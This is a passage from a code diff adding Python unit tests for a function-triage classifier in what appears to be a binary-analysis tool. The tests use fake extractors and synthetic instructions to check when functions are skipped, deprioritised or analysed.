{0x401000: [(0x401000, "ret")]}}}, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x401000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.SKIP + assert result.reason == REASON_CRT_NAME + + +def test_triage_classify_tiny_no_api_skip(): + extractor = FakeTriageExtractor( + names={0x402000: "sub_402000"}, + function_data={0x402000: {"bbs": {0x402000: [(0x402000, "nop"), (0x402001, "nop")]}}}, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x402000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.SKIP + assert result.reason == REASON_TINY_NO_API + + +def test_triage_classify_large_function_deprioritize(): + insns = [(0x500000 + i, "nop") for i in range(4096)] + extractor = FakeTriageExtractor( + names={0x500000: "sub_500000"}, + function_data={0x500000: {"bbs": {0x500000: insns}}}, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x500000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.DEPRIORITIZE + assert result.reason == REASON_LARGE_COMPLEXITY + + +def test_triage_api_presence_prevents_tiny_skip(): + extractor = FakeTriageExtractor( + names={0x403000: "sub_403000"}, + function_data={ + 0x403000: { + "bbs": {0x403000: [(0x403000, "call"), (0x403001, "ret")]}, + "insn_features": {0x403000: [API("kernel32.CreateFileA")]}, + } + }, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x403000), FakeFunction()) + + result = classify_function(extractor, fh) + assert result.decision == TriageDecision.ANALYZE + + +def test_triage_api_feature_evidence_prevents_thunk_skip(): + extractor = FakeTriageExtractor( + names={0x404000: "sub_404000"}, + function_data={ + 0x404000: { + "bbs": {0x404000: [(0x404000, "jmp")]}, + "insn_features": {0x404000: [API("kernel32.CreateFileA")]}, + } + }, + ) + fh = FunctionHandle(AbsoluteVirtualAddress(0x404000), FakeFunction()) + + result = classify_function(extractor, 
fh) + assert result.decision == TriageDecision.ANALYZE